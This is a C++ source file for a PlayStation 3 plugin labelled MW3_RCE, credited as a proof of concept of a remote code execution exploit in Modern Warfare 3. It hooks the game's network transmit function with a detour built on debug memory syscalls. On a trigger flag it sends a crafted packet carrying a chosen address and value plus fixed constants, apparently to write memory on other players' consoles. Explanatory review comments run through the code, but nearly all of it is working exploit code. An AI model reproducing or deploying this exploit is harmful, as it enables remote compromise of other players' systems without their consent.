- #include <cellstatus.h>
- #include <sys/prx.h>
- #include <time.h>
- #include <fastmath.h>
- #include <ppu_intrinsics.h>
- #include <stdarg.h>
- #include <stddef.h>
- #include <sys/prx.h>
- #include <sys/syscall.h>
- #include <sys/ppu_thread.h>
- #include <sys/sys_time.h>
- #include <sys/time_util.h>
- #include <sys/timer.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet\in.h>
- #include <arpa\inet.h>
- #include <netdb.h>
- #include <cell\pad\libpad.h>
- #include <sys/process.h>
- #include <sys/memory.h>
- // PRX module descriptor: module name/version plus the start and stop entry
- // points. _MW3_RCE_prx_entry (bottom of file) installs the hook and
- // _MW3_RCE_prx_stop removes it again.
- SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);
- SYS_MODULE_START( _MW3_RCE_prx_entry );
- SYS_MODULE_STOP(_MW3_RCE_prx_stop);
- /*
- Credits:
- Gamer7112 for bringing this to my attention
- momo5502 for originally making a post showing this off.
- Sabotage for finding the exploit and creating the PoC
- */
- // Backup of the first 0x10 bytes of the hooked game function (filled by
- // _MW3_RCE_prx_entry, written back by _MW3_RCE_prx_stop). Must stay 16 bytes.
- int RestoreHook[4];
- // The game's own memset export is used instead of the C library one
- // (presumably because the PRX is not linked against libc -- TODO confirm).
- // Note the unusual signature: the fill value is declared as void*, so the
- // literal 0 passed below is converted to a null pointer, not an int.
- extern "C" {
- void *_sys_memset(void * ptr, void* value, size_t num);
- }
- #define memset _sys_memset
- // Mirror of the game's network message structure. It is passed straight to
- // the game's MSG_Init / MSG_WriteData, so field order and sizes must match
- // the game binary exactly. This file itself only reads `data` and `cursize`.
- struct msg_t
- {
- int overflowed;
- int readOnly;
- char* data;
- char* splitData;
- int maxsize;
- int cursize;
- int splitSize;
- int readcount;
- int bit;
- int lastEntityRef;
- int targetLocalNetID;
- int useZlib;
- };
- // TOC base of the game executable. Like every address in this file it is
- // specific to one build of the game; a different build will crash here.
- #define TOC 0x72DCE8
- // Function descriptor (entry address + TOC). Taking the address of one of
- // these and casting it to a function pointer lets the PRX call functions
- // inside the game binary at fixed addresses.
- struct opd_s_o
- {
- unsigned int sub;
- unsigned int toc;
- };
- // Game routine that compresses `size` bytes from `from` into `to`
- // (called below with from == to, i.e. in place) and returns the new length.
- opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
- int(*MSG_WriteBitsCompress)(bool trainHuffman, const char *from, char *to, int size) = (int(*)(bool trainHuffman, const char *from, char *to, int size))&MSG_WriteBitsCompress_t;
- // Game routine that binds `buffer` of `size` bytes to `msg`.
- opd_s_o MSG_Init_t = { 0x001FBC78, TOC };
- int(*MSG_Init)(msg_t* msg, char* buffer, int size) = (int(*)(msg_t* msg, char* buffer, int size))&MSG_Init_t;
- // Game routine that appends `size` bytes of `data` to `msg`
- // (presumably advancing msg->cursize -- the code below relies on that).
- opd_s_o MSG_WriteData_t = { 0x001FC128, TOC };
- int(*MSG_WriteData)(msg_t* msg, unsigned char* data, int size) = (int(*)(msg_t* msg, unsigned char* data, int size))&MSG_WriteData_t;
- // Placeholder body that DetourFunction overwrites at runtime with a 0x20-byte
- // trampoline into the original CL_Netchan_Transmit. The single `li` here is
- // never meant to execute once the hook is installed.
- // NOTE(review): DetourFunction writes 0x20 bytes into this function, so the
- // compiled body must be at least that large or the bytes after it get
- // clobbered -- nothing here guarantees that; confirm in the linked output.
- int CL_Netchan_TransmitStub(...)
- {
- __asm("li %r3, 0x332;");
- }
- // Replacement for the game's CL_Netchan_Transmit (hooked at 0xDE810 by the
- // PRX entry point). In the normal case it just forwards every argument to the
- // original through the trampoline stub. When the flag word at 0x10055000
- // equals 2 it instead builds a substitute packet body from fixed constants
- // plus the value/address pair stored at 0x10055014 / 0x10055010, compresses
- // it with the game's own routine, clears the flag (one-shot) and transmits
- // that instead of `buffer`. Every address, offset and constant here is tied
- // to one game build and none of the inputs are validated.
- int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
- {
- if (*(int*)0x10055000 == 2)
- {
- msg_t message;
- memset(&message, 0, sizeof(msg_t));
- char MessageBuffer[0x1000];
- char DataToBeSent[0x1000];
- memset(MessageBuffer, 0, 0x1000);
- memset(DataToBeSent, 0, 0x1000);
- MSG_Init(&message, MessageBuffer, 0x1000);
- // Keep the first 9 bytes of the original packet (presumably its header
- // -- TODO confirm); everything after that is replaced.
- MSG_WriteData(&message, buffer, 0x9);
- // Redundant: DataToBeSent was already zeroed in full above.
- memset(DataToBeSent, 0, 0x840 + 0x9C);
- int* a = (int*)&DataToBeSent[0x808];
- a[1] = *(int*)(0x10055014); //value
- a[3] = *(int*)(0x10055010); //address
- int* r = (int*)&DataToBeSent[0x820];
- r[3] = 0xCAD8C;
- r[35] = 0x1F6E58;
- r[36] = 0xAAAAAAAA;
- // 0x840 + 0x9C = 0x8DC bytes, within the 0x1000-byte buffer.
- MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);
- // Compress everything after the 9-byte prefix in place; the returned
- // length becomes the new packet size. Relies on MSG_WriteData having
- // advanced message.cursize.
- int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);
- // Reset the trigger so the next call passes through unchanged.
- *(int*)0x10055000 = 0;
- return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
- }
- return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
- }
- // Copies `size` bytes of the current process's memory at `address` into
- // `data` via LV2 syscall 904 and returns the syscall status. `data` must
- // be able to hold `size` bytes; nothing here checks that.
- int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
- system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
- return_to_user_prog(int);
- }
- // Writes `size` bytes from `data` to `address` in the current process via
- // LV2 syscall 905, then pushes the data cache block at `address` to memory
- // and issues sync/isync so code patched there is picked up on execution.
- // Returns the syscall status.
- // NOTE(review): __dcbst only covers the single cache block containing
- // `address`; a write that straddles a block boundary (the callers write
- // 0x10 and 0x20 bytes) is not fully flushed, and no icbi is issued --
- // confirm whether the syscall itself takes care of that.
- int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
- system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
- __dcbst((void*)address);
- __sync();
- __isync();
- return_to_user_prog(int32_t);
- }
- // Redirects the game function at `address` to `hookFunc` and, optionally,
- // turns `stubFunc` into a trampoline that runs the original code.
- // `hookFunc`/`stubFunc` are function descriptors (see opd_s_o): their first
- // word is the real code address, which is why they are dereferenced as int*.
- // Both patches are absolute branches built from four PowerPC instructions:
- //   0x3D600000 lis   r11, hi16   0x396B0000 addi  r11, r11, lo16
- //   0x7D6903A6 mtctr r11         0x4E800420 bctr
- // The `& 0x8000 ? 1 : 0` term compensates for addi sign-extending lo16.
- // r11 and CTR are clobbered; the four displaced instructions are executed
- // from the stub, so they must be position-independent and must not use
- // r11/CTR themselves -- nothing here checks that.
- void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
- int StubData[8], FuncData[4];
- int hook_address = hookFunc != NULL ? *(int*)hookFunc : 0;
- int stub_address = stubFunc != NULL ? *(int*)stubFunc : 0;
- if (stub_address) {
- // Stub layout: branch setup to original+0x10 (3 words), the original's
- // first 4 instructions copied from `address` (words 3..6), then bctr.
- int branchAddr = address + 0x10;
- StubData[0] = 0x3D600000 + ((branchAddr >> 16) & 0xFFFF) + (branchAddr & 0x8000 ? 1 : 0);
- StubData[1] = 0x396B0000 + (branchAddr & 0xFFFF);
- StubData[2] = 0x7D6903A6;
- StubData[7] = 0x4E800420;
- sys_dbg_read_process_memory(address, &StubData[3], 0x10);
- sys_dbg_write_process_memory(stub_address, StubData, 0x20);
- }
- if (hook_address) {
- // Overwrite the first 4 instructions at `address` with a jump to the hook.
- FuncData[0] = 0x3D600000 + ((hook_address >> 16) & 0xFFFF) + (hook_address & 0x8000 ? 1 : 0);
- FuncData[1] = 0x396B0000 + (hook_address & 0xFFFF);
- FuncData[2] = 0x7D6903A6;
- FuncData[3] = 0x4E800420;
- sys_dbg_write_process_memory(address, FuncData, 0x10);
- }
- }
- // Module start: back up the first 0x10 bytes at 0xDE810 into RestoreHook
- // (the write syscall is used as a memcpy here: destination RestoreHook,
- // source 0xDE810), then install the detour. Syscall results are not checked.
- extern "C" int _MW3_RCE_prx_entry(void)
- {
- sys_dbg_write_process_memory((uint64_t)RestoreHook, (void*)0xDE810, 0x10);
- DetourFunction(0xDE810, CL_Netchan_Transmit, CL_Netchan_TransmitStub);
- return SYS_PRX_RESIDENT;
- }
- // Module stop: put the saved original bytes back at 0xDE810, undoing the
- // detour. The trampoline stub is left as is.
- // NOTE(review): this returns the module *start* status constant; check the
- // SDK for the status code a stop routine is expected to return.
- extern "C" int _MW3_RCE_prx_stop(void)
- {
- sys_dbg_write_process_memory((uint64_t)0xDE810, (void*)RestoreHook, 0x10);
- return SYS_PRX_RESIDENT;
- }